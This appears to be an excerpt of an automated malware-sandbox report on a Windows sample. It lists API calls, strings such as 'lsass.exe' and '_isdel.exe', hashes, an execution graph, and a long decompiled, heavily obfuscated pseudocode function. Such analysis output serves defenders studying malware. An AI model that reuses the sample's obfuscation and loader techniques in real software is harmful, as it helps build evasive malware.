                      Function 0041034F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0041035B
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 00410372
                      • __amsg_exit.LIBCMT ref: 00410380
                      • __lock.LIBCMT ref: 00410390
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                      • String ID:
                      • API String ID: 3521780317-0
                      • Opcode ID: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction ID: 078b7b1b4c449bd8eee7397e22a660bfcf81d1e5f576ffd6547d9eee0cff7ad2
                      • Opcode Fuzzy Hash: 8517ce2bbdcf7070739133a54bfd0fcc9a7dad6a08e4c43ac31606e5fd805cca
                      • Instruction Fuzzy Hash: 17F0FF31A407189BD730FBA6940279E73A0AB04718F50466FAC94A72D2CBBC59C1DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040ABF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0040AC02
                        • Part of subcall function 0040A322: __getptd_noexit.LIBCMT ref: 0040A325
                        • Part of subcall function 0040A322: __amsg_exit.LIBCMT ref: 0040A332
                      • __getptd.LIBCMT ref: 0040AC10
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: csm
                      • API String ID: 803148776-1018135373
                      • Opcode ID: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction ID: bffc41321c1a3a0fb5d007abf3a1080087ced7d40673d35ab145433e29951c07
                      • Opcode Fuzzy Hash: 54e44990dd07edcd91bd3197dc50da7e23270eee58c40dad30b91b83af6c0ef9
                      • Instruction Fuzzy Hash: B90128348043058BEF38DF65D4886AEB3B5AF10315FAA453FE481766D1CB3889A1CB0B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:1.4%
                      Dynamic/Decrypted Code Coverage:31.6%
                      Signature Coverage:15.8%
                      Total number of Nodes:38
                      Total number of Limit Nodes:3
                      execution_graph 22067 4d272d 22069 4d27c2 WriteFile 22067->22069 22097 507020 22098 507024 22097->22098 22099 507027 malloc 22097->22099 22070 4f75ed 22072 4f7613 22070->22072 22074 4c3c75 wcscat 22072->22074 22075 46ce82 22076 46cf1f LoadLibraryA 22075->22076 22077 46cf0a 22075->22077 22077->22076 22078 4afd42 22079 4afdcd CryptGetHashParam 22078->22079 22081 4aff63 22079->22081 22085 4b036b 22081->22085 22086 4ae906 22081->22086 22083 4b01b2 22084 4b0340 CryptDestroyHash 22083->22084 22084->22085 22087 4ae926 22086->22087 22088 4ae937 CharUpperBuffA 22087->22088 22088->22083 22100 23e8026 22101 23e8035 22100->22101 22104 23e87c6 22101->22104 22105 23e87e1 22104->22105 22106 23e87ea CreateToolhelp32Snapshot 22105->22106 22107 23e8806 Module32First 22105->22107 22106->22105 22106->22107 22108 23e803e 22107->22108 22109 23e8815 22107->22109 22111 23e8485 22109->22111 22112 23e84b0 22111->22112 22113 23e84c1 VirtualAlloc 22112->22113 22114 23e84f9 22112->22114 22113->22114 22089 4b0fc1 GetFileAttributesW 22090 4a65e7 22091 4a65f1 VirtualAlloc 22090->22091 22093 46db68 22094 46db86 LoadLibraryA 22093->22094 22096 46dbd6 22094->22096

                      Executed Functions

                      Function 004AFD42 Relevance: 25.0, APIs: 2, Strings: 12, Instructions: 490encryptionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 4afd42-4afdcb 1 4afdcd-4afdef 0->1 2 4afdf1-4afe2f 0->2 1->2 3 4afe7e-4afe95 2->3 4 4afe31-4afe40 2->4 5 4afe9c-4afeb7 3->5 6 4afe42-4afe6b 4->6 7 4afe71-4afe76 4->7 9 4afeb9-4afee2 5->9 10 4aff13-4aff29 5->10 6->7 7->5 8 4afe78-4afe7b 7->8 8->3 11 4afef6-4aff11 9->11 12 4afee4-4afef4 9->12 13 4aff2b 10->13 14 4aff31-4aff61 CryptGetHashParam 10->14 11->10 12->11 13->14 15 4aff63 14->15 16 4aff65-4aff8d 14->16 15->16 17 4aff8f-4affaa 16->17 18 4affb3-4affb9 16->18 17->18 19 4affac 17->19 20 4affbb-4affc9 18->20 21 4affce-4affee call 46624a 18->21 19->18 20->21 24 4b0452-4b0475 21->24 25 4afff4-4b0016 21->25 28 4b047a 24->28 26 4b004a-4b006c call 4673bf 25->26 27 4b0018-4b0047 25->27 31 4b006e-4b007b 26->31 32 4b0084-4b0092 26->32 27->26 28->28 33 4b0098-4b009f 31->33 34 4b007d 31->34 32->33 35 4b0118 33->35 36 4b00a1-4b00c3 33->36 34->32 37 4b011e-4b016d 35->37 38 4b00d3-4b0116 36->38 39 4b00c5-4b00cc 36->39 40 4b016f-4b017b 37->40 41 4b0191-4b019c 37->41 38->35 38->37 39->38 42 4b017d-4b018e 40->42 43 4b01a3-4b01ad call 4ae906 40->43 41->43 42->41 45 4b01b2-4b01c3 43->45 46 4b01eb-4b01f3 45->46 47 4b01c5-4b01e7 45->47 48 4b0211-4b0242 46->48 49 4b01f5-4b020f 46->49 47->46 50 4b027b 48->50 51 4b0244-4b026b 48->51 49->48 53 4b0281-4b02cb call 466493 50->53 52 4b026d-4b0274 51->52 51->53 52->50 56 4b02cd-4b02f5 53->56 57 4b0320 53->57 58 4b032a-4b0332 56->58 59 4b02f7-4b02fc 56->59 60 4b0327 57->60 63 4b0334-4b033d 58->63 61 4b030b-4b0313 59->61 62 4b02fe-4b0309 59->62 60->58 64 4b0340-4b0369 CryptDestroyHash 61->64 65 4b0315-4b0317 61->65 62->61 63->64 67 4b036b-4b0370 64->67 68 4b03b5-4b040d 64->68 65->63 66 4b0319-4b031e 65->66 66->57 66->60 71 4b037c-4b03af 67->71 72 4b0372-4b037a 67->72 69 4b040f-4b041f 68->69 70 4b0426-4b0451 68->70 69->70 70->24 71->68 72->71
                      C-Code - Quality: 20%
                      			E004AFD42(intOrPtr __ecx, void* __edx, signed int __edi, void* __esi) {
				signed int _t111;
				signed int _t117;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				signed int _t133;
				signed int _t138;
				signed int _t141;
				signed int _t145;
				signed int _t147;
				signed int _t150;
				signed int _t152;
				signed int _t153;
				unsigned int _t162;
				signed int _t165;
				signed int _t174;
				unsigned short _t191;
				char* _t199;
				unsigned short _t204;
				signed int _t210;
				char* _t227;
				intOrPtr _t245;
				signed int _t247;
				void* _t248;
				intOrPtr _t274;
				short _t280;
				void* _t288;
				short _t291;
				signed int _t296;
				signed int _t297;
				void* _t304;
				signed short _t305;
				signed int _t306;
				void* _t324;
				signed int _t325;
				void* _t327;
				void* _t329;
				void* _t333;
				signed int _t335;
				signed int _t337;
				void* _t345;

				_t111 =  *(_t345 - 8);
				_push( *((intOrPtr*)(_t345 - 0x70)));
				_t296 = __edx - __esi;
				_t333 = __esi - 0xb5e3a7;
				 *0x50bf14 = _t111;
				_t324 = (__edi ^ 0x00cb1a6d) - 1;
				 *0x50bf07 = _t111;
				 *(_t345 - 8) = _t111;
				 *(_t345 - 0x14) = 0x296659;
				 *(_t345 - 8) = _t111;
				 *((intOrPtr*)(_t345 - 0x1c)) = 0x3f8cff;
				 *((intOrPtr*)(_t345 - 0x20)) = __ecx;
				 *0x50919a = 0x762a;
				_push( *((intOrPtr*)(_t345 - 0x68)));
				_t272 = 0xec54;
				_t117 =  *(_t345 - 8);
				if(0x3f8cff <= 0x3362) {
					_t272 =  *0x509172; // 0x87
					 *0x5091c0 = _t296;
					_t296 = 0;
				}
				 *0x50bf13 = _t117;
				_t335 = _t333 + 0x0000b189 & 0x00ad5e5d;
				_t191 =  *0x50bf14; // 0x0
				_push(2);
				_t325 = _t324 + 0xf1a7;
				 *(_t345 - 8) = _t117;
				 *(_t345 - 0x18) = _t191 >> _t272;
				_t122 =  *(_t345 - 8);
				if(_t122 >= 0x26bf) {
					L7:
					_t272 = 0x66de;
					 *((intOrPtr*)(_t345 - 0x28)) =  *((intOrPtr*)(_t345 - 0x28)) + 0x66de;
					_t296 =  *0x50919a; // 0xc472
					goto L8;
				} else {
					if(_t272 > _t272) {
						_t272 = _t272 + 0x6f;
						 *0x509196 = _t272;
						_t296 = 0x9d04;
						_t335 = _t335 + _t335;
						 *0x50bf15 = _t122;
						_t325 = (_t325 & 0x00d38946) - 0xda9b88;
					}
					if(_t122 >= 0x767a4) {
						L8:
						 *0x50a80c =  *0x50a80c - _t296;
						 *0x50bf11 =  *0x50bf11 - _t296;
						_push( *((intOrPtr*)(_t345 - 0x60)));
						 *0x50962e =  *0x50962e + _t325;
						 *(_t345 - 8) = _t122;
						if(_t122 != 0x1a) {
							 *(_t345 - 0x18) =  *(_t345 - 0x18) - "mscpxl32.dLL";
							_t272 = _t272 - 0x57103b;
							 *0x50916e = _t272;
							 *0x509184 = _t272;
							if((_t296 & 0x007a6b86) <= 0) {
								 *0x509208 = 0x9061;
								_t296 = _t335;
							}
							_t325 = _t325 - 0xd658e3;
							_t122 = 0x1f6e09;
						}
						_t199 = "HMETAFILEPICT_UserSize";
						 *0x50913e = _t272;
						if(_t272 > _t272) {
							_t272 = _t272 + 0x6d36e1;
						}
						 *0x5091d8 = _t296;
						_t297 =  *0x50920c; // 0xe35a
						 *0x50bf12 =  *0x50bf12 - _t122;
						 *0x50bf13 =  *0x50bf13 + _t122;
						_t124 =  *0x509cb0();
						_t337 = _t335 + 0xbaffb9;
						if(_t124 <= 0) {
							_t325 = 0;
						}
						 *(_t345 - 8) = _t124;
						 *(_t345 - 0x14) = _t199;
						_t129 =  *(_t345 - 8);
						if(_t129 <= 0x2e) {
							 *0x5090fc =  *0x5090fc - 0x3e86af;
							_t272 = 0x6540;
							if(0x6540 == 0x6540) {
								 *0x509194 =  *0x509194 - 0x6540;
							}
						}
						if((_t297 & 0x007718c1) >= 0) {
							_t297 = _t297 + 0x948f - 1;
							 *0x50bf12 = _t129;
							_t337 = _t337 - 0xcbc0;
						}
						 *(_t345 - 8) = _t129;
						E0046624A(_t129, _t272, _t297, _t325, _t337, _t129);
						_t133 =  *(_t345 - 8);
						_t204 =  *(_t345 - 0x10) >> _t272;
						if(_t133 == 0) {
							 *0x50bf13 = _t133;
							 *(_t345 - 8) = _t133;
							_push(_t204 + 1);
							_push(E004B047C);
							goto __ebx;
						} else {
							_t327 = 0xffffffffff313c87;
							 *0x50bf07 = _t133;
							 *(_t345 - 8) = _t133;
							_t138 =  *(_t345 - 8);
							_t207 = "_isdel.exe";
							if("_isdel.exe" < 0x3421a7) {
								 *0x509124 =  *0x509124 - 0x49586e;
								 *((intOrPtr*)(_t345 - 0x24)) =  *((intOrPtr*)(_t345 - 0x24)) - _t272;
								_t272 = 0x7933;
								_t297 = 0xffffffffffffffff;
								 *0x50bf13 = _t138;
								_t337 = 0;
								_t207 = 0x495793;
							}
							 *(_t345 - 8) = _t138;
							_push("wuapi.dll");
							_push(0);
							_push(1);
							E004673BF(_t207);
							_t141 =  *(_t345 - 8);
							if("NtPowerInformation" > "NtPowerInformation") {
								L27:
								_t297 = 0x99c8;
								 *0x50aacc =  *0x50aacc + 0x99c8;
								goto L28;
							} else {
								_t291 =  *0x509140; // 0x7264
								if(_t291 > _t291) {
									L28:
									_t210 = _t141;
									_push( *((intOrPtr*)(_t345 - 0x64)));
									if(_t327 < 0) {
										L32:
										 *0x50bf0b =  *0x50bf0b - _t210;
										L33:
										 *(_t345 - 0x18) = _t210;
										_t274 =  *0x509114; // 0x7c68
										 *0x50bf0e =  *0x50bf0e - _t274;
										 *0x50bf0f =  *0x50bf0f + _t274;
										_t276 = 0x8543;
										 *0x50bf11 =  *0x50bf11 + 0x8d26;
										_push( *((intOrPtr*)(_t345 - 0x68)));
										_t304 = 0xadbb;
										 *(_t345 - 8) = _t141;
										if(_t141 <= 0x166597) {
											L36:
											_t304 = 0x8f3d;
											 *0x5091ea =  *0x5091ea - 0x8f3d;
											 *0x509206 =  *0x509206 - 0x8f3d;
											L37:
											_t305 = _t304 + _t304;
											_t145 = E004AE906(); // executed
											 *0x50bf13 = 0xca;
											 *(_t345 - 8) = _t145;
											if( !_t145 < 0x2b) {
												_t276 = _t276 - 0x6b;
												 *0x509170 =  *0x509170 + _t276;
												 *((intOrPtr*)(_t345 - 0x2c)) =  *((intOrPtr*)(_t345 - 0x2c)) + _t276;
												_t305 = 0x9936;
											}
											_t147 =  *(_t345 - 8);
											if(_t147 <= 0xb10b0) {
												 *(_t345 - 0x14) =  *(_t345 - 0x14) - 0x204777;
												 *(_t345 - 0x18) = 0x204777;
												_t276 =  !_t276;
											}
											 *(_t345 - 8) = _t147;
											 *(_t345 - 0x10) = 0x1a2514;
											_t150 =  *(_t345 - 8);
											 *(_t345 - 0x6c) = _t150;
											 *(_t345 - 8) = _t150;
											_t152 =  *(_t345 - 8);
											 *(_t345 - 8) = _t152;
											if(_t152 >= 0x15e26f) {
												L44:
												_t153 =  *0x50bf13; // -9
												goto L45;
											} else {
												_t153 = 0x2b1935;
												 *((intOrPtr*)(_t345 - 0x1c)) = 0xf41967;
												_t288 = _t276 + 0x5f5c;
												 *0x50bf0e =  *0x50bf0e + _t288;
												_t276 = _t288 + _t288;
												if((_t276 & 0x00000081) >= 0) {
													L45:
													 *0x50bf14 =  *0x50bf14 + _t153;
													_t329 = _t327 + _t327 + 0xcdbd29;
													_push( *((intOrPtr*)(_t345 - 0x60)));
													E00466493( *(_t345 - 8) +  *(_t345 - 8), 0x340b36, _t276, _t329, 0x14ca10,  *(_t345 - 8) +  *(_t345 - 8), 0);
													_t162 =  *(_t345 - 8);
													if(0x340b36 <= 0x34fb15) {
														L52:
														 *0x50905c =  *0x50905c - _t162;
														L53:
														 *(_t345 - 0x10) = _t162;
														L54:
														L55:
														_t280 = 0xea;
														L56:
														 *0x5091a8 = _t280;
														_t306 = _t305 ^ 0x00008af6;
														 *(_t345 - 8) =  *0x509d1c();
														_t165 =  *(_t345 - 8);
														 *(_t345 - 8) = _t165;
														if(_t165 > 0x17d4) {
															if( *(_t345 - 0x10) > 0x30) {
																 *((intOrPtr*)(_t345 - 0x1c)) =  *((intOrPtr*)(_t345 - 0x1c)) - 0x38ba92;
															}
															_t306 = _t306 + 0x785ee6 - 0x98;
															 *0x50921c = _t306;
															_t174 =  *0x50bf13; // -9
															 *0x50bf14 = _t174;
															 *0x50bf14 = _t174;
															_t165 = _t174 - _t174;
														}
														 *0x50bf07 = _t165;
														_push(0);
														_t227 =  *(_t345 - 0x14);
														 *0x50bf0b =  *0x50bf0b - _t227;
														 *0x5090ea =  *0x5090ea + _t227;
														_push( *((intOrPtr*)(_t345 - 0x5c)));
														 *0x50bf09 =  *0x50bf09 - 0x191ec3;
														if( &(_t227[_t227]) == 0x2bc7) {
															 *((intOrPtr*)(_t345 - 0x20)) =  *((intOrPtr*)(_t345 - 0x20)) - 0x438c51;
														}
														 *0x50bf10 =  *0x50bf10 + _t306;
														_push(0x4b0452);
														_push( *0x509c28);
														return  *(_t345 - 8);
													}
													 *0x50915a = _t276;
													_t280 = 0x84;
													 *0x5091be =  *0x5091be + _t305;
													 *0x5091d8 = _t305;
													if((_t305 & 0x000099af) > 0) {
														goto L54;
													}
													if((_t305 & 0x0000a974) <= 0) {
														 *0x50bf13 = _t162;
													}
													_t329 = _t329 - 0xe0a5;
													if(_t329 < 0) {
														goto L56;
													} else {
														if(_t329 >= 0) {
															goto L55;
														}
														if(_t162 >= 0xd) {
															goto L53;
														}
														goto L52;
													}
												}
												_t305 =  *0x5091b2; // 0x23e0
												 *0x50921e = _t305;
												goto L44;
											}
										}
										_t141 =  *(_t345 - 0x10);
										_t245 = _t210 - 0x32aea0;
										if(_t245 == _t245) {
											goto L37;
										}
										 *((intOrPtr*)(_t345 - 0x1c)) = _t245;
										_t276 = 0x8573;
										 *0x509182 = 0x8543;
										goto L36;
									}
									_t247 =  *0x50bf07; // 0x0
									_t248 = _t247 - 0x1395f9;
									 *0x50905e =  *0x50905e + _t141;
									 *0x509078 =  *0x509078 + _t141;
									if(_t248 > 0x36f145) {
										 *((intOrPtr*)(_t345 - 0x20)) = _t248 + 1;
									}
									 *0x5091ac = _t297;
									 *0x50bf12 =  *0x50bf12 - 0x9bdf;
									_t337 = (_t337 & 0x0000b386) - 0xaf27aa;
									 *0x50ba8f =  *0x50ba8f - _t327;
									 *0x50bf15 = _t141;
									_t327 = 0;
									 *0x509014 =  *0x509014;
									 *(_t345 - 8) = _t141;
									_t210 = _t141;
									if(_t141 < 0x27) {
										goto L33;
									} else {
										goto L32;
									}
								}
								 *0x50918a = _t291;
								goto L27;
							}
						}
					} else {
						 *(_t345 - 8) = _t122;
						goto L7;
					}
				}
			}












































                      0x004afd42
                      0x004afd45
                      0x004afd48
                      0x004afd50
                      0x004afd56
                      0x004afd67
                      0x004afd68
                      0x004afd6d
                      0x004afd7a
                      0x004afd87
                      0x004afd9c
                      0x004afd9f
                      0x004afdb0
                      0x004afdb7
                      0x004afdba
                      0x004afdc3
                      0x004afdcb
                      0x004afddf
                      0x004afde6
                      0x004afdef
                      0x004afdef
                      0x004afdf6
                      0x004afdfc
                      0x004afe04
                      0x004afe0a
                      0x004afe0c
                      0x004afe11
                      0x004afe1d
                      0x004afe28
                      0x004afe2f
                      0x004afe7e
                      0x004afe8b
                      0x004afe8f
                      0x004afe95
                      0x00000000
                      0x004afe31
                      0x004afe40
                      0x004afe42
                      0x004afe45
                      0x004afe56
                      0x004afe5c
                      0x004afe60
                      0x004afe6b
                      0x004afe6b
                      0x004afe76
                      0x004afe9c
                      0x004afe9c
                      0x004afea2
                      0x004afea8
                      0x004afeab
                      0x004afeb2
                      0x004afeb7
                      0x004afec3
                      0x004afec8
                      0x004afece
                      0x004afed5
                      0x004afee2
                      0x004afee8
                      0x004afeef
                      0x004afef4
                      0x004afefa
                      0x004aff07
                      0x004aff0c
                      0x004aff1b
                      0x004aff20
                      0x004aff29
                      0x004aff2b
                      0x004aff2b
                      0x004aff31
                      0x004aff3b
                      0x004aff42
                      0x004aff48
                      0x004aff57
                      0x004aff5d
                      0x004aff61
                      0x004aff63
                      0x004aff63
                      0x004aff65
                      0x004aff72
                      0x004aff88
                      0x004aff8d
                      0x004aff97
                      0x004affa2
                      0x004affaa
                      0x004affac
                      0x004affac
                      0x004affaa
                      0x004affb9
                      0x004affc0
                      0x004affc1
                      0x004affc9
                      0x004affc9
                      0x004affce
                      0x004affd2
                      0x004affe5
                      0x004affe8
                      0x004affee
                      0x004b045c
                      0x004b0464
                      0x004b046f
                      0x004b0470
                      0x004b047a
                      0x004afff4
                      0x004afff7
                      0x004afffd
                      0x004b0002
                      0x004b0008
                      0x004b000b
                      0x004b0016
                      0x004b0020
                      0x004b0027
                      0x004b002c
                      0x004b003d
                      0x004b003e
                      0x004b0044
                      0x004b0047
                      0x004b0047
                      0x004b004a
                      0x004b0052
                      0x004b0053
                      0x004b0055
                      0x004b0057
                      0x004b0062
                      0x004b006c
                      0x004b0087
                      0x004b008e
                      0x004b0092
                      0x00000000
                      0x004b006e
                      0x004b0071
                      0x004b007b
                      0x004b0098
                      0x004b0098
                      0x004b009a
                      0x004b009f
                      0x004b0118
                      0x004b0118
                      0x004b011e
                      0x004b011e
                      0x004b0123
                      0x004b012a
                      0x004b0130
                      0x004b0138
                      0x004b0140
                      0x004b0149
                      0x004b0155
                      0x004b0165
                      0x004b016d
                      0x004b0191
                      0x004b0191
                      0x004b0195
                      0x004b019c
                      0x004b01a3
                      0x004b01a3
                      0x004b01ad
                      0x004b01b2
                      0x004b01bc
                      0x004b01c3
                      0x004b01d4
                      0x004b01d7
                      0x004b01de
                      0x004b01e7
                      0x004b01e7
                      0x004b01eb
                      0x004b01f3
                      0x004b01fd
                      0x004b0200
                      0x004b020f
                      0x004b020f
                      0x004b0211
                      0x004b0219
                      0x004b0220
                      0x004b0228
                      0x004b022b
                      0x004b0233
                      0x004b023a
                      0x004b0242
                      0x004b027b
                      0x004b027b
                      0x00000000
                      0x004b0244
                      0x004b0247
                      0x004b0252
                      0x004b025a
                      0x004b025f
                      0x004b0265
                      0x004b026b
                      0x004b0281
                      0x004b0287
                      0x004b0290
                      0x004b029c
                      0x004b02b9
                      0x004b02c2
                      0x004b02cb
                      0x004b0320
                      0x004b0320
                      0x004b0327
                      0x004b0327
                      0x004b032a
                      0x004b0334
                      0x004b033d
                      0x004b0340
                      0x004b0340
                      0x004b0347
                      0x004b0353
                      0x004b035b
                      0x004b0362
                      0x004b0369
                      0x004b0370
                      0x004b0377
                      0x004b0377
                      0x004b038f
                      0x004b0392
                      0x004b039c
                      0x004b03a2
                      0x004b03a8
                      0x004b03ad
                      0x004b03af
                      0x004b03b5
                      0x004b03d8
                      0x004b03d9
                      0x004b03dc
                      0x004b03e2
                      0x004b03f7
                      0x004b0402
                      0x004b040d
                      0x004b041a
                      0x004b041f
                      0x004b042d
                      0x004b0446
                      0x004b044b
                      0x004b0451
                      0x004b0451
                      0x004b02d5
                      0x004b02df
                      0x004b02e2
                      0x004b02e9
                      0x004b02f5
                      0x00000000
                      0x00000000
                      0x004b02fc
                      0x004b0301
                      0x004b0309
                      0x004b030b
                      0x004b0313
                      0x00000000
                      0x004b0315
                      0x004b0317
                      0x00000000
                      0x00000000
                      0x004b031e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004b031e
                      0x004b0313
                      0x004b026d
                      0x004b0274
                      0x00000000
                      0x004b0274
                      0x004b0242
                      0x004b016f
                      0x004b0172
                      0x004b017b
                      0x00000000
                      0x00000000
                      0x004b017d
                      0x004b0184
                      0x004b0187
                      0x00000000
                      0x004b0187
                      0x004b00a1
                      0x004b00a7
                      0x004b00ad
                      0x004b00b4
                      0x004b00c3
                      0x004b00c6
                      0x004b00cc
                      0x004b00d3
                      0x004b00e3
                      0x004b00ef
                      0x004b00f7
                      0x004b00fd
                      0x004b0102
                      0x004b0108
                      0x004b010f
                      0x004b0112
                      0x004b0116
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004b0116
                      0x004b007d
                      0x00000000
                      0x004b007d
                      0x004b006c
                      0x004afe78
                      0x004afe78
                      0x00000000
                      0x004afe7b
                      0x004afe76

                      APIs
                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?), ref: 004AFF57
                      • CryptDestroyHash.ADVAPI32(?,00000000,?,00000001,00000000,wuapi.dll,?), ref: 004B034D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CryptHash$DestroyParam
                      • String ID: HMETAFILEPICT_UserSize$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$OSProvider.dll$System.Xml.XmlDocument.dll$Yf)$_isdel.exe$lsass.exe$mscpxl32.dLL$normaliz.dll$wG $wuapi.dll
                      • API String ID: 1393782385-3654168436
                      • Opcode ID: 45cfe202dc7e8c58852e1405462b7d1786453299d8915dfa52d70ad113504c83
                      • Instruction ID: 68b14b2c4468a07a9191b323ebc64f1ad8ee46526c47b202c1aa2b39c27e80b3
                      • Opcode Fuzzy Hash: 45cfe202dc7e8c58852e1405462b7d1786453299d8915dfa52d70ad113504c83
                      • Instruction Fuzzy Hash: 7A12BC75E4434A8FDB00DFB9EC982CE7BB1EB39310F08446AD944A7326E3790A49DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046DB68 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 278 46db68-46db84 279 46db86-46db9e 278->279 280 46dba2-46dbaa 278->280 279->280 281 46dbac-46dbb7 280->281 282 46dbba-46dbd4 LoadLibraryA 280->282 281->282 283 46dbd6-46dbdd 282->283 284 46dbf3-46dc09 282->284 285 46dbdf-46dbec 283->285 286 46dc0b-46dc18 283->286 284->286 287 46dbee 285->287 288 46dc1f-46dc72 285->288 286->288 287->284 289 46dc74-46dc87 288->289 290 46dca5-46dcaa 288->290 291 46dca0 289->291 292 46dc89-46dc9e 289->292 293 46dcac-46dcb7 290->293 294 46dcbd-46dcff 290->294 291->290 292->291 293->294 295 46dd10-46dd21 294->295 296 46dd01-46dd09 294->296 296->295 297 46dd0b 296->297 297->295
                      APIs
                      • LoadLibraryA.KERNELBASE(?), ref: 0046DBC6
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: RegDeleteKeyExW$WinFax.dll$api-ms-win-core-string-l1-1-0.dll$wuapi.dll
                      • API String ID: 1029625771-4165016147
                      • Opcode ID: eef2808c2eecf06cebdc7b8a2258de0b09de5736e07ad9d81aac6d6dc3525ae7
                      • Instruction ID: dd2f8b21f777de2ffc0e392a0a20a3262fa7c5ff35a77f3b9579320fd692dded
                      • Opcode Fuzzy Hash: eef2808c2eecf06cebdc7b8a2258de0b09de5736e07ad9d81aac6d6dc3525ae7
                      • Instruction Fuzzy Hash: 6F41AE75F103069FDB00AF79D9E82DE7BB1FB69310F48842AC9009732AE3340989DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004D272D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 310 4d272d-4d27c0 311 4d27d0-4d281b 310->311 312 4d27c2-4d27cd 310->312 313 4d281d-4d2828 311->313 314 4d2831-4d288c WriteFile 311->314 312->311 315 4d282c-4d282e 313->315 316 4d282a 313->316 315->314 316->315
                      APIs
                      • WriteFile.KERNELBASE(?,?,?,?), ref: 004D2847
                      Strings
                      • dpnet.dll, xrefs: 004D278A
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 004D2753
                      • ucmhc.dll, xrefs: 004D2804
                      • G.V, xrefs: 004D2876
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID: G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$dpnet.dll$ucmhc.dll
                      • API String ID: 3934441357-2877886047
                      • Opcode ID: 04ab278a087a12d1433b9ee1e379a332640db28b93b940c90da80b65bb5593e9
                      • Instruction ID: 4b8478ef53dea7fcf7c7aa7f8120348a068cb53e5b8837b35ac6c96b6ea15f9d
                      • Opcode Fuzzy Hash: 04ab278a087a12d1433b9ee1e379a332640db28b93b940c90da80b65bb5593e9
                      • Instruction Fuzzy Hash: FB4115B9E50309AFCF00DFA9D9D56DDBBB0EB28310F40806AE944E7351D2745A84DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046CE82 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 405 46ce82-46cf08 406 46cf1f-46cf3c LoadLibraryA 405->406 407 46cf0a-46cf1a 405->407 407->406
                      APIs
                      • LoadLibraryA.KERNELBASE(?), ref: 0046CF21
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: wuapi.dll
                      • API String ID: 1029625771-2797979843
                      • Opcode ID: 23b0f2297e9236c9d34dbf1247cefecadbe12954b2725eff082ce7cc5a4488b2
                      • Instruction ID: bdec6b5d9e8b2d99924f7a33a0c2e2d3546498d42ada7fff0a68cae79d638000
                      • Opcode Fuzzy Hash: 23b0f2297e9236c9d34dbf1247cefecadbe12954b2725eff082ce7cc5a4488b2
                      • Instruction Fuzzy Hash: C5113470F5420A9FDB00DFB8E8846DDBBB1EB6A724F0441699918E73A2E3B40949DB41
                      Uniqueness

